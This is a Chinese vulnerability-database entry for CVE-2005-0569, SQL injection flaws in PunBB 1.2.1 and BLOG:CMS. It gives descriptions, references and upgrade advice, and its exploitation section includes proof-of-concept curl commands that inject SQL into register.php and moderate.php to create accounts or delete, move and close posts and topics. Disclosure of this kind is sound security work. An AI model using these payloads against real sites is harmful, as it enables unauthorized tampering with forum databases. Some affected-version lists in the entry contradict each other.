CVE-2005-0569
CVSS7.5
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:12:46
NMCOS    

[原文]Multiple SQL injection vulnerabilities in PunBB 1.2.1 allow remote attackers to execute arbitrary SQL commands via the (1) language parameter to register.php, (2) change email feature in profile.php, (3) posts or (4) topics parameter to moderate.php.


[CNNVD]PunBB多个SQL注入漏洞(CNNVD-200505-549)

        PunBB是一款基于PHP的论坛程序。
        PunBB存在多个安全问题,远程攻击者可以利用这些漏洞进行SQL注入攻击或重设用户密码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0569
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0569
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-549
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110927754230666&w=2
(UNKNOWN)  BUGTRAQ  20050224 Multiple vulns in punBB
http://www.punbb.org/changelogs/1.2.1_to_1.2.2.txt
(UNKNOWN)  CONFIRM  http://www.punbb.org/changelogs/1.2.1_to_1.2.2.txt
http://www.securityfocus.com/bid/12652
(PATCH)  BID  12652
http://xforce.iss.net/xforce/xfdb/19473
(PATCH)  XF  punbb-multiple-sql-injection(19473)

- 漏洞信息

PunBB多个SQL注入漏洞
高危 SQL注入
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        PunBB是一款基于PHP的论坛程序。
        PunBB存在多个安全问题,远程攻击者可以利用这些漏洞进行SQL注入攻击或重设用户密码。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.punbb.org/

- 漏洞信息

14128
PunBB/BLOG:CMS register.php Multiple Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

PunBB and BLOG:CMS contain a flaw that will allow a remote attacker to inject arbitrary SQL code. The problem is that multiple parameters in the 'register.php' script are not verified properly and will allow a remote attacker to inject or manipulate SQL queries.

- 时间线

2005-02-24 2001-01-01
2005-02-24 Unknow

- 解决方案

Upgrade to PunBB version 1.2.2 or higher or BLOG:CMS version 3.6.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

PunBB Multiple Remote Input Validation Vulnerabilities
Input Validation Error 12652
Yes No
2005-02-24 12:00:00 2009-07-12 10:56:00
John Gumbel <johannes.gumbel.2873@student.uu.se> is credited with the discovery of this issue.

- 受影响的程序版本

PunBB PunBB 1.2.1
BLOG:CMS BLOG:CMS 3.1.4
BLOG:CMS BLOG:CMS 3.1.3
BLOG:CMS BLOG:CMS 3.1.2
BLOG:CMS BLOG:CMS 3.1
BLOG:CMS BLOG:CMS 3.0
PunBB PunBB 1.2.2
BLOG:CMS BLOG:CMS 3.6.4
BLOG:CMS BLOG:CMS 3.6.2

- 不受影响的程序版本

PunBB PunBB 1.2.2
BLOG:CMS BLOG:CMS 3.6.4
BLOG:CMS BLOG:CMS 3.6.2

- 漏洞讨论

Multiple remote input validation vulnerabilities affect PunBB. These issues are due to a failure of the application to sanitize user-supplied input prior to using it to carry out critical functions.

The first issue is an SQL injection issue in the 'register.php' script. The second issue is an SQL injection issue in the 'moderate.php' script. A third SQL injection issue exists in the 'profile.php' script. Finally an access validation issue affects the 'profile.php' script.

An attacker may leverage these issues to have arbitrary SQL queries executed against the database; this may facilitate data corruption or manipulation. Furthermore one of these issues may be leveraged to trigger a denial of service condition against current user by setting their passwords to a NULL value.

- 漏洞利用

No exploit is required to leverage any of these issues. The following proof of concepts have been provided:

This example demonstrates the SQL injection vulnerability in the language parameter:

curl --form form_sent=1 --form req_username=sha --form req_password1=passwd --form req_paspasswd --form req_email1=sha@punbb.com --form
language="English', 'Oxygen', 0, '0.0.0.0', 0) -- " http://target/register.php?action=registerer

Attacks delete posts:
curl --referer http://www.example.com/moderate.php --form posts="0) -- this won't show" --form delete_posts_comply=1 --cookie punbb_cookie=&lt;valid
cookie&gt; target/moderate.php?fid=1\&amp;tid=1

Attacks move topics:
curl --referer http://www.example.com/moderate.php --form topics="2) -- this won't show" --form move_to_forum=2 --form move_topics=1 --form
move_topics_to=1 --cookie punbb_cookie=&lt;valid cookie&gt; target/moderate.php?fid=1

Attacks delete topics:
curl --referer http://www.example.com/moderate.php --form topics="2) -- this won't show" --form delete_topics=1 --form delete_topics_comply=1
--cookie punbb_cookie=&lt;valid cookie&gt; target/moderate.php?fid=1

Attacks open/close:
curl --referer http://www.example.com/moderate.php --form "topics[0) -- this won't show]"= --form open=1 --cookie "punbb_cookie=&lt;valid cookie&gt;
target/moderate.php?fid=1

- 解决方案

The vendor has released an update to address these issues:

BLOG:CMS has released an updated package that contains a release of PunBB that is not affected by these vulnerabilities.


PunBB PunBB 1.2.1

BLOG:CMS BLOG:CMS 3.0

BLOG:CMS BLOG:CMS 3.1

BLOG:CMS BLOG:CMS 3.1.2

BLOG:CMS BLOG:CMS 3.1.3

BLOG:CMS BLOG:CMS 3.1.4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站